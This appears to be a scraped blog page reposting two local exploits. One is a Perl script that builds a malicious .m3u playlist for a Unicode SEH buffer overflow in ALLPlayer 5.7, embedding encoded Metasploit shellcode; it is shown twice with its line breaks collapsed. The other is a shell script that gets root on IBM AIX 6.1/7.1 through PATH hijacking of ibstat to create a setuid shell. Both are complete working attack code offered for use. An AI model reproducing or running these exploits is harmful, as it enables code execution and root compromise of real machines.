#!/usr/bin/perl################################################################################ Exploit Title: ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)# Date: 11-23-2013# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift# Vulnerable Software: ALLPlayer 5.7 # Software Link: http://www.allplayer.org/download/allplayer# Version: 5.7# Tested On: Windows XP SP3 and Windows 7 Pro SP1##############################################################################my $buffsize = 5000; # sets buffer size for consistent sized payloadmy $junk = "http://" . "\x41" x 303; # offset to sehmy $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nopmy $seh = "\x11\x66"; # overwrite seh with unicode friendly pop pop ret # 0x00660011 : pop ecx pop ebp ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [ALLPlayer.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.7.0.0 (C:\Program Files\ALLPlayer\ALLPlayer.exe)# unicode venetian alignmentmy $venalign = "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad $venalign = $venalign . "\x71"; # venetian pad/align$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (100 bytes)$venalign = $venalign . "\x6e"; # venetian pad/align$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400$venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x2d\x13\x11"; # sub eax,0x11001300$venalign = $venalign . "\x6e"; # venetian pad/align$venalign = $venalign . "\x50"; # push eax$venalign = $venalign . "\x6d"; # venetian pad/align$venalign = $venalign . "\xc3"; # retmy $nops = "\x71" x 109; # some unicode friendly filler before the shellcode# Calc.exe payload# msfpayload windows/exec CMD=calc.exe R# alpha2 unicode/uppercasemy $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA"."BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"."58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"."AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"."22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"."MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"."Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"."NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"."R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"."NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"."89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"."KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"."QQ2LRCM0LJA"; my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffermy $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junkmy $buffer = $sploit.$fill; # assemble the final buffer# write the exploit buffer to filemy $file = "allplayer_unicodeseh.m3u";open(FILE, ">$file");print FILE $buffer;close(FILE);print "Exploit file [" . $file . "] created\n";print "Buffer size: " . length($buffer) . "\n";
Showing posts with label Local. Show all posts
Showing posts with label Local. Show all posts
Monday, November 25, 2013
[local] - ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)
#!/usr/bin/perl################################################################################ Exploit Title: ALLPlayer 5.7 (.m3u) - SEH Buffer Overflow (Unicode)# Date: 11-23-2013# Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift# Vulnerable Software: ALLPlayer 5.7 # Software Link: http://www.allplayer.org/download/allplayer# Version: 5.7# Tested On: Windows XP SP3 and Windows 7 Pro SP1##############################################################################my $buffsize = 5000; # sets buffer size for consistent sized payloadmy $junk = "http://" . "\x41" x 303; # offset to sehmy $nseh = "\x61\x62"; # overwrite next seh with popad (populates all registers) + nopmy $seh = "\x11\x66"; # overwrite seh with unicode friendly pop pop ret # 0x00660011 : pop ecx pop ebp ret | startnull,unicode,ascii {PAGE_EXECUTE_READ} [ALLPlayer.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.7.0.0 (C:\Program Files\ALLPlayer\ALLPlayer.exe)# unicode venetian alignmentmy $venalign = "\x53"; # push ebx; ebx is the register closest to our shellcode following the popad $venalign = $venalign . "\x71"; # venetian pad/align$venalign = $venalign . "\x58"; # pop eax; put ebx into eax and modify to jump to our shellcode (100 bytes)$venalign = $venalign . "\x6e"; # venetian pad/align$venalign = $venalign . "\x05\x14\x11"; # add eax,0x11001400$venalign = $venalign . "\x6e"; # venetian pad/align $venalign = $venalign . "\x2d\x13\x11"; # sub eax,0x11001300$venalign = $venalign . "\x6e"; # venetian pad/align$venalign = $venalign . "\x50"; # push eax$venalign = $venalign . "\x6d"; # venetian pad/align$venalign = $venalign . "\xc3"; # retmy $nops = "\x71" x 109; # some unicode friendly filler before the shellcode# Calc.exe payload# msfpayload windows/exec CMD=calc.exe R# alpha2 unicode/uppercasemy $shell = "PPYAIAIAIAIAQATAXAZAPA3QADAZA"."BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"."58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"."AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"."22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"."MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"."Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"."NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"."R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"."NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"."89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"."KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"."QQ2LRCM0LJA"; my $sploit = $junk.$nseh.$seh.$venalign.$nops.$shell; # assemble the exploit portion of the buffermy $fill = "\x71" x ($buffsize - length($sploit)); # fill remainder of buffer with junkmy $buffer = $sploit.$fill; # assemble the final buffer# write the exploit buffer to filemy $file = "allplayer_unicodeseh.m3u";open(FILE, ">$file");print FILE $buffer;close(FILE);print "Exploit file [" . $file . "] created\n";print "Buffer size: " . length($buffer) . "\n"; 
Thursday, September 26, 2013
[local] - IBM AIX 6.1 / 7.1 - Local root Privilege Escalation
#!/bin/sh# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation# Date: 2013-09-24# Exploit Author: Kristian Erik Hermansen # Vendor Homepage: http://www.ibm.com# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02# Tested on: IBM AIX 6.1# CVE: CVE-2013-4011echo ' mm mmmmm m m ## # # # # # # ## #mm# # m""m # # mm#mm m" "m'echo "[*] AIX root privilege escalation"echo "[*] Kristian Erik Hermansen"echo "[*] https://linkedin.com/in/kristianhermansen"echo "+++++?????????????~.:,.:+???????????+++++++++???????????+...:.,.,.=??????????++++++???????????~.,:~=~:::..,.~?????????+++++???????????:,~==++++==~,,.?????????+++++???????????,:=+++++++=~:,,~????????++++++?????????+,~~=++++++=~:,,:????????+++++++????????~,~===~=+~,,::,:+???????+++++++++???????=~===++~~~+,,~::???????++++++++++++?????=~=+++~~~:++=~:~+???++++++++++++++++????~~=+++~+=~===~~:+??+++++++++++++++++?????~~=====~~==~:,:?++++++++++++++++++++????+~==:::::=~:,+??++++++++++++++++++++?????:~~=~~~~~::,??+++++++++++++++++++++?????=~:~===~,,,????++++++++++++++++++++???+:==~:,,.:~~..+??+++++++++++++++++++++....==+===~~=~,...=?+++++++++++++++++,........~=====..........++++++++++++................................++==+:....................................="TMPDIR=/tmpTAINT=${TMPDIR}/arpRSHELL=${TMPDIR}/r00t-shcat > ${TAINT} <<-!#!/bin/shcp /bin/sh ${RSHELL}chown root ${RSHELL} chmod 4555 ${RSHELL}!chmod 755 ${TAINT}PATH=.:${PATH}export PATHcd ${TMPDIR}/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/nullif [ -e ${RSHELL} ]; then echo "[+] Access granted. Don't be evil..." ${RSHELL}else echo "[-] Exploit failed. Try some 0day instead..."fi
Subscribe to:
Posts (Atom)
RSS Feed
Twitter
Facebook